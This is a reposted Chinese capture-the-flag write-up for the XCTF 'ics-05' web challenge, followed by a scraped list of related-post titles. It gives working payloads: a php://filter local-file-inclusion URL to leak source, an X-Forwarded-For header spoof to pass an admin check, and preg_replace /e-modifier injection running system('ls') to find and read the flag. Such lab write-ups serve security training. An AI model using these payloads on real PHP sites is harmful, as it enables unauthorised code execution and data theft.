访问,由于提示说是后台,所以访问index.php/my-webshell(路径任意)  发现是文件包含页面

http://111.198.29.45:42305/index.php/dsf?page=php://filter/read=convert.base64-encode/resource=index.php

base64decode

重点:
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

echo "<br >Welcome My Admin ! <br >";

$pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}

根据上面函数

在头文件中添加

X-Forwarded-For:127.0.0.1

搜索preg_replace()任意php执行漏洞

构造利用值
pat=/test/e&rep=phpinfo()&sub=jutst%20test

物理路径/var/www/html

pat=/test/e&rep=任意PHP语句&sub=jutst%20test

pat=/test/e&rep=system("ls")&sub=jutst%20test

目录如下
index.html
index.php
js
layui
logo.png
s3chahahaDir
start.sh
视图.png

由于 system("")有空格报错

经查询得

用+或者%20替代空格   并且&为%26替换

命令system("cd+s3chahahaDir%26%26+ls")  得到下一个文件目录为flag

命令system("cd+s3chahahaDir/flag%26%26+ls")  得到flag.php

由于是php文件 于是用伪协议读取flag.php内容 (如果是txt直接路径访问)
http://111.198.29.45:42305/index.php/?page=php://filter/read=convert.base64-encode/resource=s3chahahaDir/flag/flag.php

PD9waHAKCiRmbGFnID0gJ2N5YmVycGVhY2V7ZDRkNmRiMjY4ZGU0YzhjZTU0ZDQxNTFiYTU0NjFkNWV9JzsKCj8+Cg==

base64解密得flag

转载于:https://www.cnblogs.com/Zhu013/p/11553500.html

攻防世界 ics-05 write up相关推荐

  1. 【愚公系列】2023年05月 攻防世界-Web(lottery)

    文章目录 前言 一.lottery 1.题目 2.答题 前言 dirsearch是一个用于Web服务器的爬虫工具,它可以快速地扫描网站的目录,并找出隐藏的文件和目录.dirsearch可以检测出许多常 ...

  2. 攻防世界MISC刷题1-50

    目录 1.ext3 2.base64stego 3.功夫再高也怕菜刀 4.easycap 5.reverseMe 6.Hear-with-your-Eyes 7.What-is-this 8.norm ...

  3. 攻防世界-PWN-new_easypwn

    攻防世界-PWN-new_easypwn 检查保护机制 healer@healer-virtual-machine:~/Desktop/attachments$ checksec hello [*] ...

  4. 攻防世界 Pwn 进阶 第二页

    00 这文章更重要的是对这些题进行一个总结,说一些值得注意的地方,写一些自己的理解. 为了形成一个体系,想将前面学过的一些东西都拉来放在一起总结总结,方便学习,方便记忆. 攻防世界 Pwn 新手 攻防 ...

  5. 攻防世界 Pwn 进阶 第一页

    00 要把它跟之前新手区的放在一起总结,先稍稍回顾一下新手区. 攻防世界 Pwn 新手 1.栈溢出,从简单到难,开始有后门函数,到需要自己写函数参数,到最后的ret2libc. 常见漏洞点有read( ...

  6. 攻防世界--Misc文件类型

    Misc文件类型 文件下载后发现一大字符串 一开始放进winhex里面各种对照文件头 修改后缀名 但发现都没有效果 后来看了wp才知道一开始拿到的是一串密文(被题目误导了) 需要进行解码 放入winh ...

  7. 攻防世界 base64stego

    title: 攻防世界 base64stego date: 2021年8月16日 15点22分 tags: 攻防世界 categories: 攻防世界 这道题也是很狡猾啊,没接触过的话,任凭怎么想,可 ...

  8. 攻防世界-MISC:base64stego

    这是攻防世界新手练习区的第十一题,题目如下: 点击下载附件一,发现是一个压缩包,点击解压,发现是需要密码才能解密 先用010editor打开这个压缩包,这里需要知道zip压缩包的组成部分,包括压缩源文 ...

  9. 攻防世界web进阶区Web_python_block_chain详解

    攻防世界web进阶区Web_python_block_chain详解 题目 详解 51% 双花攻击 题目 详解 我们整理一下 Announcement: The server has been res ...

  10. web做题记录(buuoj,jarvis,攻防世界,bugku,hackme)

    web做题笔记 文章目录 web做题笔记 buuoj easy_tornado 随便注 warmup easysql 高明的黑客 jarvisoj re? flag在管理员手上 api调用 chopp ...

最新文章

  1. IE兼容CSS3圆角border-radius,box-shadow,text-shadow的方法
  2. 【Android 逆向】函数拦截原理 ( 通过修改 GOT 全局偏移表拦截函数 | 通过在实际被调用的函数中添加跳转代码实现函数拦截 )
  3. easyexcel获取所有sheet页名称_老板让我汇总多个sheet,我不会,同事却说使用PQ仅需2步搞定...
  4. LeetCode 727. 最小窗口子序列(滑动窗口)
  5. string.empty , , null 以及性能的比较
  6. 黑马day16 jqueryamp;属性过滤选择器
  7. discuz仿手游控游戏论坛商业版网站模板
  8. web前端的十种jquery特效及源码下载
  9. hdu 1698 Just a Hook
  10. android切图双数,浅谈网页设计切图规范
  11. STM32 独立按键扫描功能大全-支持连击、组合连击、任意连击
  12. 虹科方案 | 全天候监控维护射频网络稳定运行,你不知道的新方案
  13. C语言:丹尼斯·里奇的不朽遗产
  14. pano2vr.exe下载
  15. koa利用koa-views通过路由返回html页面
  16. 数字炸弹游戏c语言,数字炸弹游戏作文500字
  17. EagleEye简介:户外视频监控分析和面部识别软件
  18. 解决mac登录APPLE ID无限重复弹窗提示登录
  19. 如何用电脑控制手机屏幕,写工作日志
  20. 计算机应用专业可以考哪些证,计算机应用技术专业学生需要考取哪些证书?

热门文章

  1. OpenCV-特征提取与检测(02、Shi-Tomasi角点检测)
  2. 微型计算机的分类通常以什么来划分,微机的分类通常以微处理器的什么来划分...
  3. localhost提示没有入口_管家婆财贸双全连接失败,服务器端没有找到加密狗
  4. 【2019百度之星初赛二1002=HDU6675】度度熊与排列(贪心)
  5. 【POJ1064】Cable master(二分搜索+浮点判断处理)
  6. linux文件偏移函数实验报告,Linux实验报告二.doc
  7. Swift 5 用TableView实现动态Excel表格Spreadsheet
  8. 1 1 2 2 3 ...java_java 接收一个键盘输入的整数,计算1-1/2!+1/3!-1/4!.....1/n!
  9. mysql乐观锁和悲观锁的区别_mysql悲观锁和乐观锁的区别
  10. std string与线程安全_是std :: regex线程安全吗?